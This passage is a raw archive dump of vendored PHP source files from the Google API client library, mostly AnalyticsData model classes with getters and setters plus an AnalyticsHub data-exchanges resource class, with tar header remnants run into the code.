/** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunRealtimeReportRequest::class, 'Google_Service_AnalyticsData_RunRealtimeReportRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CohortSpec.php000064400000004172147600400120023221 0ustar00cohortReportSettings = $cohortReportSettings; } /** * @return CohortReportSettings */ public function getCohortReportSettings() { return $this->cohortReportSettings; } /** * @param Cohort[] */ public function setCohorts($cohorts) { $this->cohorts = $cohorts; } /** * @return Cohort[] */ public function getCohorts() { return $this->cohorts; } /** * @param CohortsRange */ public function setCohortsRange(CohortsRange $cohortsRange) { $this->cohortsRange = $cohortsRange; } /** * @return CohortsRange */ public function getCohortsRange() { return $this->cohortsRange; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CohortSpec::class, 'Google_Service_AnalyticsData_CohortSpec'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionExpression.php000064400000004100147600400120025144 0ustar00concatenate = $concatenate; } /** * @return ConcatenateExpression */ public function getConcatenate() { return $this->concatenate; } /** * @param CaseExpression */ public function setLowerCase(CaseExpression $lowerCase) { $this->lowerCase = $lowerCase; } /** * @return CaseExpression */ public function getLowerCase() { return $this->lowerCase; } /** * @param CaseExpression */ public function setUpperCase(CaseExpression $upperCase) { $this->upperCase = $upperCase; } /** * @return CaseExpression */ public function getUpperCase() { return $this->upperCase; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionExpression::class, 'Google_Service_AnalyticsData_DimensionExpression'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CaseExpression.php000064400000002176147600400120024105 0ustar00dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CaseExpression::class, 'Google_Service_AnalyticsData_CaseExpression'); google-api/vendor/google/apiclient-services/src/AnalyticsData/OrderBy.php000064400000004207147600400120022515 0ustar00desc = $desc; } /** * @return bool */ public function getDesc() { return $this->desc; } /** * @param DimensionOrderBy */ public function setDimension(DimensionOrderBy $dimension) { $this->dimension = $dimension; } /** * @return DimensionOrderBy */ public function getDimension() { return $this->dimension; } /** * @param MetricOrderBy */ public function setMetric(MetricOrderBy $metric) { $this->metric = $metric; } /** * @return MetricOrderBy */ public function getMetric() { return $this->metric; } /** * @param PivotOrderBy */ public function setPivot(PivotOrderBy $pivot) { $this->pivot = $pivot; } /** * @return PivotOrderBy */ public function getPivot() { return $this->pivot; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OrderBy::class, 'Google_Service_AnalyticsData_OrderBy'); google-api/vendor/google/apiclient-services/src/AnalyticsData/V1betaAudienceDimensionValue.php000064400000002160147600400120026566 0ustar00value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(V1betaAudienceDimensionValue::class, 'Google_Service_AnalyticsData_V1betaAudienceDimensionValue'); google-api/vendor/google/apiclient-services/src/AnalyticsData/PivotDimensionHeader.php000064400000002534147600400120025230 0ustar00dimensionValues = $dimensionValues; } /** * @return DimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotDimensionHeader::class, 'Google_Service_AnalyticsData_PivotDimensionHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunRealtimeReportResponse.php000064400000007701147600400120026313 0ustar00dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Row[] */ public function setMaximums($maximums) { $this->maximums = $maximums; } /** * @return Row[] */ public function getMaximums() { return $this->maximums; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param Row[] */ public function setMinimums($minimums) { $this->minimums = $minimums; } /** * @return Row[] */ public function getMinimums() { return $this->minimums; } /** * @param PropertyQuota */ public function setPropertyQuota(PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } /** * @param Row[] */ public function setTotals($totals) { $this->totals = $totals; } /** * @return Row[] */ public function getTotals() { return $this->totals; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunRealtimeReportResponse::class, 'Google_Service_AnalyticsData_RunRealtimeReportResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Cohort.php000064400000003250147600400120022402 0ustar00dateRange = $dateRange; } /** * @return DateRange */ public function getDateRange() { return $this->dateRange; } /** * @param string */ public function setDimension($dimension) { $this->dimension = $dimension; } /** * @return string */ public function getDimension() { return $this->dimension; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Cohort::class, 'Google_Service_AnalyticsData_Cohort'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Filter.php000064400000005336147600400120022400 0ustar00betweenFilter = $betweenFilter; } /** * @return BetweenFilter */ public function getBetweenFilter() { return $this->betweenFilter; } /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param InListFilter */ public function setInListFilter(InListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return InListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param NumericFilter */ public function setNumericFilter(NumericFilter $numericFilter) { $this->numericFilter = $numericFilter; } /** * @return NumericFilter */ public function getNumericFilter() { return $this->numericFilter; } /** * @param StringFilter */ public function setStringFilter(StringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return StringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Filter::class, 'Google_Service_AnalyticsData_Filter'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CohortReportSettings.php000064400000002165147600400120025323 0ustar00accumulate = $accumulate; } /** * @return bool */ public function getAccumulate() { return $this->accumulate; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CohortReportSettings::class, 'Google_Service_AnalyticsData_CohortReportSettings'); google-api/vendor/google/apiclient-services/src/AnalyticsData/ResponseMetaData.php000064400000006662147600400120024355 0ustar00currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param bool */ public function setDataLossFromOtherRow($dataLossFromOtherRow) { $this->dataLossFromOtherRow = $dataLossFromOtherRow; } /** * @return bool */ public function getDataLossFromOtherRow() { return $this->dataLossFromOtherRow; } /** * @param string */ public function setEmptyReason($emptyReason) { $this->emptyReason = $emptyReason; } /** * @return string */ public function getEmptyReason() { return $this->emptyReason; } /** * @param SamplingMetadata[] */ public function setSamplingMetadatas($samplingMetadatas) { $this->samplingMetadatas = $samplingMetadatas; } /** * @return SamplingMetadata[] */ public function getSamplingMetadatas() { return $this->samplingMetadatas; } /** * @param SchemaRestrictionResponse */ public function setSchemaRestrictionResponse(SchemaRestrictionResponse $schemaRestrictionResponse) { $this->schemaRestrictionResponse = $schemaRestrictionResponse; } /** * @return SchemaRestrictionResponse */ public function getSchemaRestrictionResponse() { return $this->schemaRestrictionResponse; } /** * @param bool */ public function setSubjectToThresholding($subjectToThresholding) { $this->subjectToThresholding = $subjectToThresholding; } /** * @return bool */ public function getSubjectToThresholding() { return $this->subjectToThresholding; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ResponseMetaData::class, 'Google_Service_AnalyticsData_ResponseMetaData'); google-api/vendor/google/apiclient-services/src/AnalyticsData/StringFilter.php000064400000003160147600400120023560 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(StringFilter::class, 'Google_Service_AnalyticsData_StringFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionMetadata.php000064400000005071147600400120024535 0ustar00apiName = $apiName; } /** * @return string */ public function getApiName() { return $this->apiName; } /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param bool */ public function setCustomDefinition($customDefinition) { $this->customDefinition = $customDefinition; } /** * @return bool */ public function getCustomDefinition() { return $this->customDefinition; } /** * @param string[] */ public function setDeprecatedApiNames($deprecatedApiNames) { $this->deprecatedApiNames = $deprecatedApiNames; } /** * @return string[] */ public function getDeprecatedApiNames() { return $this->deprecatedApiNames; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setUiName($uiName) { $this->uiName = $uiName; } /** * @return string */ public function getUiName() { return $this->uiName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionMetadata::class, 'Google_Service_AnalyticsData_DimensionMetadata'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Operation.php000064400000004147147600400120023112 0ustar00done = $done; } /** * @return bool */ public function getDone() { return $this->done; } /** * @param Status */ public function setError(Status $error) { $this->error = $error; } /** * @return Status */ public function getError() { return $this->error; } /** * @param array[] */ public function setMetadata($metadata) { $this->metadata = $metadata; } /** * @return array[] */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param array[] */ public function setResponse($response) { $this->response = $response; } /** * @return array[] */ public function getResponse() { return $this->response; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Operation::class, 'Google_Service_AnalyticsData_Operation'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionCompatibility.php000064400000003172147600400120025626 0ustar00compatibility = $compatibility; } /** * @return string */ public function getCompatibility() { return $this->compatibility; } /** * @param DimensionMetadata */ public function setDimensionMetadata(DimensionMetadata $dimensionMetadata) { $this->dimensionMetadata = $dimensionMetadata; } /** * @return DimensionMetadata */ public function getDimensionMetadata() { return $this->dimensionMetadata; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionCompatibility::class, 'Google_Service_AnalyticsData_DimensionCompatibility'); google-api/vendor/google/apiclient-services/src/AnalyticsData/BatchRunPivotReportsRequest.php000064400000002507147600400120026630 0ustar00requests = $requests; } /** * @return RunPivotReportRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BatchRunPivotReportsRequest::class, 'Google_Service_AnalyticsData_BatchRunPivotReportsRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/DimensionHeader.php000064400000002102147600400120024175 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionHeader::class, 'Google_Service_AnalyticsData_DimensionHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsData/FilterExpressionList.php000064400000002474147600400120025314 0ustar00expressions = $expressions; } /** * @return FilterExpression[] */ public function getExpressions() { return $this->expressions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterExpressionList::class, 'Google_Service_AnalyticsData_FilterExpressionList'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunReportResponse.php000064400000010467147600400120024633 0ustar00dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Row[] */ public function setMaximums($maximums) { $this->maximums = $maximums; } /** * @return Row[] */ public function getMaximums() { return $this->maximums; } /** * @param ResponseMetaData */ public function setMetadata(ResponseMetaData $metadata) { $this->metadata = $metadata; } /** * @return ResponseMetaData */ public function getMetadata() { return $this->metadata; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param Row[] */ public function setMinimums($minimums) { $this->minimums = $minimums; } /** * @return Row[] */ public function getMinimums() { return $this->minimums; } /** * @param PropertyQuota */ public function setPropertyQuota(PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } /** * @param Row[] */ public function setTotals($totals) { $this->totals = $totals; } /** * @return Row[] */ public function getTotals() { return $this->totals; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunReportResponse::class, 'Google_Service_AnalyticsData_RunReportResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/V1betaAudienceRow.php000064400000002613147600400120024416 0ustar00dimensionValues = $dimensionValues; } /** * @return V1betaAudienceDimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(V1betaAudienceRow::class, 'Google_Service_AnalyticsData_V1betaAudienceRow'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MetricValue.php000064400000002075147600400120023370 0ustar00value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricValue::class, 'Google_Service_AnalyticsData_MetricValue'); google-api/vendor/google/apiclient-services/src/AnalyticsData/RunPivotReportResponse.php000064400000007533147600400120025655 0ustar00aggregates = $aggregates; } /** * @return Row[] */ public function getAggregates() { return $this->aggregates; } /** * @param DimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param ResponseMetaData */ public function setMetadata(ResponseMetaData $metadata) { $this->metadata = $metadata; } /** * @return ResponseMetaData */ public function getMetadata() { return $this->metadata; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param PivotHeader[] */ public function setPivotHeaders($pivotHeaders) { $this->pivotHeaders = $pivotHeaders; } /** * @return PivotHeader[] */ public function getPivotHeaders() { return $this->pivotHeaders; } /** * @param PropertyQuota */ public function setPropertyQuota(PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RunPivotReportResponse::class, 'Google_Service_AnalyticsData_RunPivotReportResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MinuteRange.php000064400000003204147600400120023361 0ustar00endMinutesAgo = $endMinutesAgo; } /** * @return int */ public function getEndMinutesAgo() { return $this->endMinutesAgo; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param int */ public function setStartMinutesAgo($startMinutesAgo) { $this->startMinutesAgo = $startMinutesAgo; } /** * @return int */ public function getStartMinutesAgo() { return $this->startMinutesAgo; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MinuteRange::class, 'Google_Service_AnalyticsData_MinuteRange'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Metadata.php000064400000003560147600400120022670 0ustar00dimensions = $dimensions; } /** * @return DimensionMetadata[] */ public function getDimensions() { return $this->dimensions; } /** * @param MetricMetadata[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return MetricMetadata[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Metadata::class, 'Google_Service_AnalyticsData_Metadata'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CheckCompatibilityResponse.php000064400000003756147600400120026445 0ustar00dimensionCompatibilities = $dimensionCompatibilities; } /** * @return DimensionCompatibility[] */ public function getDimensionCompatibilities() { return $this->dimensionCompatibilities; } /** * @param MetricCompatibility[] */ public function setMetricCompatibilities($metricCompatibilities) { $this->metricCompatibilities = $metricCompatibilities; } /** * @return MetricCompatibility[] */ public function getMetricCompatibilities() { return $this->metricCompatibilities; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CheckCompatibilityResponse::class, 'Google_Service_AnalyticsData_CheckCompatibilityResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MetricHeader.php000064400000002443147600400120023503 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricHeader::class, 'Google_Service_AnalyticsData_MetricHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Metric.php000064400000003102147600400120022363 0ustar00expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param bool */ public function setInvisible($invisible) { $this->invisible = $invisible; } /** * @return bool */ public function getInvisible() { return $this->invisible; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Metric::class, 'Google_Service_AnalyticsData_Metric'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MetricCompatibility.php000064400000003107147600400120025122 0ustar00compatibility = $compatibility; } /** * @return string */ public function getCompatibility() { return $this->compatibility; } /** * @param MetricMetadata */ public function setMetricMetadata(MetricMetadata $metricMetadata) { $this->metricMetadata = $metricMetadata; } /** * @return MetricMetadata */ public function getMetricMetadata() { return $this->metricMetadata; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricCompatibility::class, 'Google_Service_AnalyticsData_MetricCompatibility'); google-api/vendor/google/apiclient-services/src/AnalyticsData/BatchRunReportsRequest.php000064400000002444147600400120025606 0ustar00requests = $requests; } /** * @return RunReportRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BatchRunReportsRequest::class, 'Google_Service_AnalyticsData_BatchRunReportsRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/QueryAudienceExportResponse.php000064400000004026147600400120026632 0ustar00audienceExport = $audienceExport; } /** * @return AudienceExport */ public function getAudienceExport() { return $this->audienceExport; } /** * @param V1betaAudienceRow[] */ public function setAudienceRows($audienceRows) { $this->audienceRows = $audienceRows; } /** * @return V1betaAudienceRow[] */ public function getAudienceRows() { return $this->audienceRows; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(QueryAudienceExportResponse::class, 'Google_Service_AnalyticsData_QueryAudienceExportResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/ListAudienceExportsResponse.php000064400000003232147600400120026621 0ustar00audienceExports = $audienceExports; } /** * @return AudienceExport[] */ public function getAudienceExports() { return $this->audienceExports; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListAudienceExportsResponse::class, 'Google_Service_AnalyticsData_ListAudienceExportsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/PivotOrderBy.php000064400000003130147600400120023531 0ustar00metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param PivotSelection[] */ public function setPivotSelections($pivotSelections) { $this->pivotSelections = $pivotSelections; } /** * @return PivotSelection[] */ public function getPivotSelections() { return $this->pivotSelections; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotOrderBy::class, 'Google_Service_AnalyticsData_PivotOrderBy'); google-api/vendor/google/apiclient-services/src/AnalyticsData/MetricMetadata.php000064400000006544147600400120024041 0ustar00apiName = $apiName; } /** * @return string */ public function getApiName() { return $this->apiName; } /** * @param string[] */ public function setBlockedReasons($blockedReasons) { $this->blockedReasons = $blockedReasons; } /** * @return string[] */ public function getBlockedReasons() { return $this->blockedReasons; } /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param bool */ public function setCustomDefinition($customDefinition) { $this->customDefinition = $customDefinition; } /** * @return bool */ public function getCustomDefinition() { return $this->customDefinition; } /** * @param string[] */ public function setDeprecatedApiNames($deprecatedApiNames) { $this->deprecatedApiNames = $deprecatedApiNames; } /** * @return string[] */ public function getDeprecatedApiNames() { return $this->deprecatedApiNames; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUiName($uiName) { $this->uiName = $uiName; } /** * @return string */ public function getUiName() { return $this->uiName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricMetadata::class, 'Google_Service_AnalyticsData_MetricMetadata'); google-api/vendor/google/apiclient-services/src/AnalyticsData/BatchRunPivotReportsResponse.php000064400000003140147600400120026770 0ustar00kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param RunPivotReportResponse[] */ public function setPivotReports($pivotReports) { $this->pivotReports = $pivotReports; } /** * @return RunPivotReportResponse[] */ public function getPivotReports() { return $this->pivotReports; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BatchRunPivotReportsResponse::class, 'Google_Service_AnalyticsData_BatchRunPivotReportsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsData/CheckCompatibilityRequest.php000064400000005513147600400120026270 0ustar00compatibilityFilter = $compatibilityFilter; } /** * @return string */ public function getCompatibilityFilter() { return $this->compatibilityFilter; } /** * @param FilterExpression */ public function setDimensionFilter(FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param FilterExpression */ public function setMetricFilter(FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CheckCompatibilityRequest::class, 'Google_Service_AnalyticsData_CheckCompatibilityRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsData/NumericFilter.php000064400000002676147600400120023727 0ustar00operation = $operation; } /** * @return string */ public function getOperation() { return $this->operation; } /** * @param NumericValue */ public function setValue(NumericValue $value) { $this->value = $value; } /** * @return NumericValue */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(NumericFilter::class, 'Google_Service_AnalyticsData_NumericFilter'); vendor/google/apiclient-services/src/AnalyticsHub/Resource/ProjectsLocationsDataExchanges.php000064400000022152147600400120030610 0ustar00google-api * $analyticshubService = new Google\Service\AnalyticsHub(...); * $dataExchanges = $analyticshubService->projects_locations_dataExchanges; * */ class ProjectsLocationsDataExchanges extends \Google\Service\Resource { /** * Creates a new data exchange. (dataExchanges.create) * * @param string $parent Required. The parent resource path of the data * exchange. e.g. `projects/myproject/locations/US`. * @param DataExchange $postBody * @param array $optParams Optional parameters. * * @opt_param string dataExchangeId Required. The ID of the data exchange. Must * contain only Unicode letters, numbers (0-9), underscores (_). Should not use * characters that require URL-escaping, or characters outside of ASCII, spaces. * Max length: 100 bytes. * @return DataExchange */ public function create($parent, DataExchange $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('create', [$params], DataExchange::class); } /** * Deletes an existing data exchange. (dataExchanges.delete) * * @param string $name Required. The full name of the data exchange resource * that you want to delete. For example, * `projects/myproject/locations/US/dataExchanges/123`. * @param array $optParams Optional parameters. * @return AnalyticshubEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('delete', [$params], AnalyticshubEmpty::class); } /** * Gets the details of a data exchange. (dataExchanges.get) * * @param string $name Required. The resource name of the data exchange. e.g. * `projects/myproject/locations/US/dataExchanges/123`. * @param array $optParams Optional parameters. * @return DataExchange */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('get', [$params], DataExchange::class); } /** * Gets the IAM policy. (dataExchanges.getIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * requested. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param GetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function getIamPolicy($resource, GetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('getIamPolicy', [$params], Policy::class); } /** * Lists all data exchanges in a given project and location. * (dataExchanges.listProjectsLocationsDataExchanges) * * @param string $parent Required. The parent resource path of the data * exchanges. e.g. `projects/myproject/locations/US`. * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of results to return in a single * response page. Leverage the page tokens to iterate through the entire * collection. * @opt_param string pageToken Page token, returned by a previous call, to * request the next page of results. * @return ListDataExchangesResponse */ public function listProjectsLocationsDataExchanges($parent, $optParams = []) { $params = ['parent' => $parent]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ListDataExchangesResponse::class); } /** * Lists all subscriptions on a given Data Exchange or Listing. * (dataExchanges.listSubscriptions) * * @param string $resource Required. Resource name of the requested target. This * resource may be either a Listing or a DataExchange. e.g. * projects/123/locations/US/dataExchanges/456 OR e.g. * projects/123/locations/US/dataExchanges/456/listings/789 * @param array $optParams Optional parameters. * * @opt_param bool includeDeletedSubscriptions If selected, includes deleted * subscriptions in the response (up to 63 days after deletion). * @opt_param int pageSize The maximum number of results to return in a single * response page. * @opt_param string pageToken Page token, returned by a previous call. * @return ListSharedResourceSubscriptionsResponse */ public function listSubscriptions($resource, $optParams = []) { $params = ['resource' => $resource]; $params = array_merge($params, $optParams); return $this->call('listSubscriptions', [$params], ListSharedResourceSubscriptionsResponse::class); } /** * Updates an existing data exchange. (dataExchanges.patch) * * @param string $name Output only. The resource name of the data exchange. e.g. * `projects/myproject/locations/US/dataExchanges/123`. * @param DataExchange $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. Field mask specifies the fields to * update in the data exchange resource. The fields specified in the * `updateMask` are relative to the resource and are not a full request. * @return DataExchange */ public function patch($name, DataExchange $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], DataExchange::class); } /** * Sets the IAM policy. (dataExchanges.setIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * specified. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param SetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function setIamPolicy($resource, SetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('setIamPolicy', [$params], Policy::class); } /** * Creates a Subscription to a Data Exchange. This is a long-running operation * as it will create one or more linked datasets. (dataExchanges.subscribe) * * @param string $name Required. Resource name of the Data Exchange. e.g. * `projects/publisherproject/locations/US/dataExchanges/123` * @param SubscribeDataExchangeRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function subscribe($name, SubscribeDataExchangeRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('subscribe', [$params], Operation::class); } /** * Returns the permissions that a caller has. (dataExchanges.testIamPermissions) * * @param string $resource REQUIRED: The resource for which the policy detail is * being requested. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param TestIamPermissionsRequest $postBody * @param array $optParams Optional parameters. * @return TestIamPermissionsResponse */ public function testIamPermissions($resource, TestIamPermissionsRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('testIamPermissions', [$params], TestIamPermissionsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProjectsLocationsDataExchanges::class, 'Google_Service_AnalyticsHub_Resource_ProjectsLocationsDataExchanges'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Resource/OrganizationsLocations.php000064400000002150147600400120027301 0ustar00 * $analyticshubService = new 